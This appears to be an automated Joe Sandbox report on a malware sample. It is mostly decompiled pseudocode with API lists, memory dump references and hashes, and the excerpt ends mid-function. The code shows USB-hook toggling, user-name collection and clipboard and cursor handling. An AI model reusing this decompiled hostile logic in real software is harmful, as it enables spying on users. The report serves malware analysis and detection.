                                                                                                                                                                                                                            0x0045ec15
                                                                                                                                                                                                                            0x0045ee76
                                                                                                                                                                                                                            0x0045ee7e
                                                                                                                                                                                                                            0x0045ee8f
                                                                                                                                                                                                                            0x0045ee8f
                                                                                                                                                                                                                            0x0045ee7e
                                                                                                                                                                                                                            0x0045ec15
                                                                                                                                                                                                                            0x0045ec0a
                                                                                                                                                                                                                            0x0045ebff
                                                                                                                                                                                                                            0x0045ebf8
                                                                                                                                                                                                                            0x0045ebed
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ebeb
                                                                                                                                                                                                                            0x0045eb54
                                                                                                                                                                                                                            0x0045edce
                                                                                                                                                                                                                            0x0045edd6
                                                                                                                                                                                                                            0x0045edeb
                                                                                                                                                                                                                            0x0045edeb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045edd6
                                                                                                                                                                                                                            0x0045eb5a
                                                                                                                                                                                                                            0x0045eb5d
                                                                                                                                                                                                                            0x0045ebb9
                                                                                                                                                                                                                            0x0045ebbc
                                                                                                                                                                                                                            0x0045ed5f
                                                                                                                                                                                                                            0x0045ed64
                                                                                                                                                                                                                            0x0045ed76
                                                                                                                                                                                                                            0x0045ed76
                                                                                                                                                                                                                            0x0045ebc2
                                                                                                                                                                                                                            0x0045ebc2
                                                                                                                                                                                                                            0x0045ebc5
                                                                                                                                                                                                                            0x0045ed02
                                                                                                                                                                                                                            0x0045ed07
                                                                                                                                                                                                                            0x0045ed19
                                                                                                                                                                                                                            0x0045ed19
                                                                                                                                                                                                                            0x0045ebcb
                                                                                                                                                                                                                            0x0045ebcb
                                                                                                                                                                                                                            0x0045ebd0
                                                                                                                                                                                                                            0x0045ecc4
                                                                                                                                                                                                                            0x0045ecc9
                                                                                                                                                                                                                            0x0045ecdb
                                                                                                                                                                                                                            0x0045ecdb
                                                                                                                                                                                                                            0x0045ebd6
                                                                                                                                                                                                                            0x0045ebdb
                                                                                                                                                                                                                            0x0045eda6
                                                                                                                                                                                                                            0x0045edae
                                                                                                                                                                                                                            0x0045edc3
                                                                                                                                                                                                                            0x0045edc3
                                                                                                                                                                                                                            0x0045edae
                                                                                                                                                                                                                            0x0045ebdb
                                                                                                                                                                                                                            0x0045ebd0
                                                                                                                                                                                                                            0x0045ebc5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ebbc
                                                                                                                                                                                                                            0x0045eb5f
                                                                                                                                                                                                                            0x0045ed40
                                                                                                                                                                                                                            0x0045ed45
                                                                                                                                                                                                                            0x0045ed57
                                                                                                                                                                                                                            0x0045ed57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ed45
                                                                                                                                                                                                                            0x0045eb68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eb6e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ee22
                                                                                                                                                                                                                            0x0045ee2a
                                                                                                                                                                                                                            0x0045ee30
                                                                                                                                                                                                                            0x0045ee33
                                                                                                                                                                                                                            0x0045ee37
                                                                                                                                                                                                                            0x0045ee38
                                                                                                                                                                                                                            0x0045ee3b
                                                                                                                                                                                                                            0x0045ee3d
                                                                                                                                                                                                                            0x0045ee43
                                                                                                                                                                                                                            0x0045ee43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ec86
                                                                                                                                                                                                                            0x0045ec8b
                                                                                                                                                                                                                            0x0045ec94
                                                                                                                                                                                                                            0x0045ec95
                                                                                                                                                                                                                            0x0045ec98
                                                                                                                                                                                                                            0x0045ec9a
                                                                                                                                                                                                                            0x0045ec9d
                                                                                                                                                                                                                            0x0045ec9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eca5
                                                                                                                                                                                                                            0x0045ecaa
                                                                                                                                                                                                                            0x0045ecb3
                                                                                                                                                                                                                            0x0045ecb4
                                                                                                                                                                                                                            0x0045ecb7
                                                                                                                                                                                                                            0x0045ecb9
                                                                                                                                                                                                                            0x0045ecbc
                                                                                                                                                                                                                            0x0045ecbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ed7e
                                                                                                                                                                                                                            0x0045ed86
                                                                                                                                                                                                                            0x0045ed8f
                                                                                                                                                                                                                            0x0045ed90
                                                                                                                                                                                                                            0x0045ed93
                                                                                                                                                                                                                            0x0045ed95
                                                                                                                                                                                                                            0x0045ed9b
                                                                                                                                                                                                                            0x0045ed9b
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0045EAF6
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0045EF62), ref: 0045EF34
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FromListNtdllPathProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2126419269-0
                                                                                                                                                                                                                            • Opcode ID: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                                                                                                                                                                                            • Instruction ID: 2b1d187c4c8c1c8eaadb8a9a71d85ca4ed6e9094f5dd7d40d25eedc3d4306855
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E1B135A001449BDB18DF6AC489AEEB7B5AF08301F5480F6DC65DB397C7789E88CB19
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004289FC(intOrPtr* __eax, void* __ecx, void* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                            				struct tagENHMETAHEADER _v104;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr* _t37;
                                                                                                                                                                                                                            				struct HENHMETAFILE__* _t43;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t37 = __eax;
                                                                                                                                                                                                                            				_t43 = GetClipboardData(0xe);
                                                                                                                                                                                                                            				if(_t43 == 0) {
                                                                                                                                                                                                                            					_t35 =  *0x49dbf4; // 0x422ed8
                                                                                                                                                                                                                            					E00425F28(_t35);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0042819C(_t37);
                                                                                                                                                                                                                            				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                                                                                                                                                                                                                            				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                                                                                                                                                                                                                            				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                                                                                                                                                                                                                            				 *((short*)(_t44 + 0x18)) = 0;
                                                                                                                                                                                                                            				 *((char*)(_t37 + 0x2c)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                            				return  *((intOrPtr*)( *_t37 + 0x10))();
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetClipboardData.USER32 ref: 00428A09
                                                                                                                                                                                                                            • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00428A2B
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00428A3D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$ClipboardCopyDataHeader
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1752724394-0
                                                                                                                                                                                                                            • Opcode ID: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                                                                                                                                                                                            • Instruction ID: 0727d7d259e4847e38e41a473cb046f23bcddc174ccbaa46af5af426c499999d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D117C71B003008FC710DFAED881A9ABBF8AF05310F10457EE909DB292DA74EC058B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458EA4() {
                                                                                                                                                                                                                            				struct tagPOINT _v12;
                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                            				long _t6;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x49ebc8 = GetCurrentThreadId();
                                                                                                                                                                                                                            				L5:
                                                                                                                                                                                                                            				_t5 =  *0x49ebcc; // 0x0
                                                                                                                                                                                                                            				_t6 = WaitForSingleObject(_t5, 0x64);
                                                                                                                                                                                                                            				if(_t6 == 0x102) {
                                                                                                                                                                                                                            					if( *0x49ebb8 != 0 &&  *((intOrPtr*)( *0x49ebb8 + 0x60)) != 0) {
                                                                                                                                                                                                                            						GetCursorPos( &_v12);
                                                                                                                                                                                                                            						if(E004397F4( &_v12) == 0) {
                                                                                                                                                                                                                            							E0045B3A8( *0x49ebb8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458EB0
                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00458ECD
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00458EED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1359611202-0
                                                                                                                                                                                                                            • Opcode ID: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                                                            • Instruction ID: 5466cc4fe75e799d867a24ddfff030feada42c46f86c6fe88e2ad44c126da2fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F054315082049BDB14EB5AD887B5633A8EB14316F50017FE911E62D2DF7EA849C61E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E00496E18(intOrPtr __eax, void* __ebx, signed int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				signed int _t95;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				intOrPtr _t133;
                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t140 = _t141;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                                                                            				_t138 = __eax;
                                                                                                                                                                                                                            				_push(_t140);
                                                                                                                                                                                                                            				_push(0x49702a);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t141;
                                                                                                                                                                                                                            				if((((0 |  *((intOrPtr*)(__eax + 0x314)) != 0x00000000) ^ 0x00000001) & __edx) != 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t138 + 0x314)) = E0045F2E0(__eax, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t95 == 0) {
                                                                                                                                                                                                                            					_t64 =  *((intOrPtr*)(_t138 + 0x314));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t138 + 0x314)) != 0) {
                                                                                                                                                                                                                            						E0045E724(_t64, 0);
                                                                                                                                                                                                                            						E004967D4(_t138, _t95, "USB Hooks -> Deactive");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(_t140);
                                                                                                                                                                                                                            					_push(0x496fe6);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t141;
                                                                                                                                                                                                                            					_t111 =  *0x49f144; // 0x0
                                                                                                                                                                                                                            					E00404CCC( &_v8, 0x497040, _t111);
                                                                                                                                                                                                                            					if(E00409A58(_v8) == 0) {
                                                                                                                                                                                                                            						_t134 =  *0x49f144; // 0x0
                                                                                                                                                                                                                            						E00404CCC( &_v12, 0x497040, _t134);
                                                                                                                                                                                                                            						E00409F54(_v12);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0041B944( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x314)) + 0xee)));
                                                                                                                                                                                                                            					_t80 = E0045F1B4( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x314)) + 0xee)));
                                                                                                                                                                                                                            					_t15 = _t80 + 0xc; // 0xc
                                                                                                                                                                                                                            					_t112 =  *0x49f144; // 0x0
                                                                                                                                                                                                                            					E00404CCC(_t15, 0x497040, _t112);
                                                                                                                                                                                                                            					 *((char*)(_t80 + 0x10)) = 1;
                                                                                                                                                                                                                            					_t83 =  *((intOrPtr*)(_t138 + 0x314));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x32)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x36)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x3a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x3e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x42)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x46)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x4a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x4e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x56)) = _t138;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x52)) = E00497080;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x5a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x5e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x66)) = _t138;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x62)) = E004971A8;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x6a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x6e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x72)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x76)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x7a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x7e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x82)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x86)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x8a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x8e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x92)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x96)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x9a)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0x9e)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xa2)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xa6)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xaa)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xae)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xb2)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xb6)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xba)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xbe)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xc2)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xc6)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xca)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t83 + 0xce)) = 0;
                                                                                                                                                                                                                            					E0045E724(_t83, 1);
                                                                                                                                                                                                                            					E004967D4(_t138, _t80, "USB Hooks -> Active");
                                                                                                                                                                                                                            					_pop(_t133);
                                                                                                                                                                                                                            					 *[fs:eax] = _t133;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t106);
                                                                                                                                                                                                                            				 *[fs:eax] = _t106;
                                                                                                                                                                                                                            				_push(0x497031);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: USB Hooks -> Active$USB Hooks -> Deactive$\WS
                                                                                                                                                                                                                            • API String ID: 0-2668585806
                                                                                                                                                                                                                            • Opcode ID: a68f3ea6cb02ce5dad457843472a772aaadbee1f170168573917ccbb51b3d805
                                                                                                                                                                                                                            • Instruction ID: 21d0f2a4fcc44797754ad5cfb282af012faa24cd7fd9520cc74cc85fb853990d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a68f3ea6cb02ce5dad457843472a772aaadbee1f170168573917ccbb51b3d805
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A251EBB1A04A448FD718DF2BC845B96BBE6EFC8304F16C0BBD4089B376E73599058B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00472E58(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_t26 = __eax;
                                                                                                                                                                                                                            				_push(_t39);
                                                                                                                                                                                                                            				_push(0x472ed2);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t39 + 0xfffffff8;
                                                                                                                                                                                                                            				_v12 = 0xff;
                                                                                                                                                                                                                            				E0040500C( &_v8, _v12);
                                                                                                                                                                                                                            				if(GetUserNameA(E00404E80(_v8),  &_v12) == 0) {
                                                                                                                                                                                                                            					E00404A14(_t26, "Unknown");
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404EE0(_v8, _v12 - 1, 1, _t26);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t35);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
                                                                                                                                                                                                                            				_push(0x472ed9);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00472E93
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                            • API String ID: 2645101109-1654365787
                                                                                                                                                                                                                            • Opcode ID: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                                                                                                                                                                                            • Instruction ID: 0e574cec38e77eee5c3ac86c404587bc9d0c2a183e22f9869122a41002a7b21b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2016770A04508ABDB00DBA6DD4199EB7E9EB88304F61817AA504E3691D778AE01955D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044083C(intOrPtr* __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				intOrPtr* _t37;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t37 = __eax;
                                                                                                                                                                                                                            				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                            					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						return  *((intOrPtr*)( *_t37 - 0x10))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t25 = E0044078C(_t37, _t45);
                                                                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t31 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t34 = E004519E0(_t37);
                                                                                                                                                                                                                            						_t44 = _t34;
                                                                                                                                                                                                                            						if(_t34 == 0) {
                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t25 = E0043C130(_t44, 0, 0xb017, _v8);
                                                                                                                                                                                                                            							if(_t25 == 0) {
                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t25;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureIconic
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2277910766-0
                                                                                                                                                                                                                            • Opcode ID: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                                                                                                                                                                                            • Instruction ID: 1854ad3725da6f9c39b561de1c6dc083fd0ae92529cbbd4a26d730481ff8a107
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114231B00205DBFB24FF59C685AAAB3F4AF04304B24407AF504EB352DB38ED549B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00425FB8(void* __ebx) {
                                                                                                                                                                                                                            				char _v260;
